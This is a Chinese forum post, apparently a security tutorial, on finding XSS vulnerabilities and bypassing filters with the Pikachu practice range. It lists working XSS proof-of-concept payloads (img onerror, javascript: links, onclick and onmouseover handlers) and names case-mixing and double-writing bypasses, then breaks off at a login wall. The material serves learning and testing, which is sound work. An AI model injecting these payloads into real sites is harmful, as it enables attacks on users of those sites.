Web漏洞-XSS绕过和pikachu靶场4个场景(三)

打印 上一主题 下一主题

主题 830|帖子 830|积分 2490

★★实战前置声明★★
文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与学习之用,读者将其信息做其他用途,由用户承担全部法律及连带责任,文章作者不承担任何法律及连带责任。
1、XSS漏洞挖掘与绕过

1.1、XSS漏洞挖掘

数据交互(输入/输出)的地方最容易产生跨站脚本,最重要的是考虑输入、输出在什么地方。一般常会对网站的输入框、URL参数、COOKIE、POST表单、HTTP头内容进行测试。
1.2、手工测试XSS步骤

1、找到测试点,比如搜索框、留言板。
2、根据测试流程首先实验一些特殊符号的输入,发现可以正常输出,说明后端并没有进行相关的过滤。比如:'?"&/6666
3、如果有过滤则进行相关的绕过。
1.3、XSS常见POC


常见XSS语句'>[/code]常见XSS语句<img>标签
  1. <img src=x onerror=alert(/xss/)>
  2. <img src=javascript:alert(1)> //版本,E7.0|IE6.0,才能执行  
  3. <img src=# onmouseover="alert(1)">
复制代码
常见XSS语句标签
  1. "> <a target="_blank" target="_blank" target="_blank" href=javascript:alert('xss') > xss</a>
  2. "> <a target="_blank" href="https://www.cnblogs.com/" onclick="alert(1)"> xss</a>
复制代码
1.4、XSS漏洞绕过方法

[code]// 1.大小写绕过// 2.双写绕过

本帖子中包含更多资源

您需要 登录 才可以下载或查看,没有账号?立即注册

x
回复

使用道具 举报

0 个回复

正序浏览

快速回复

您需要登录后才可以回帖 登录 or 立即注册

本版积分规则

祗疼妳一个

金牌会员
这个人很懒什么都没写!

标签云

快速回复 返回顶部 返回列表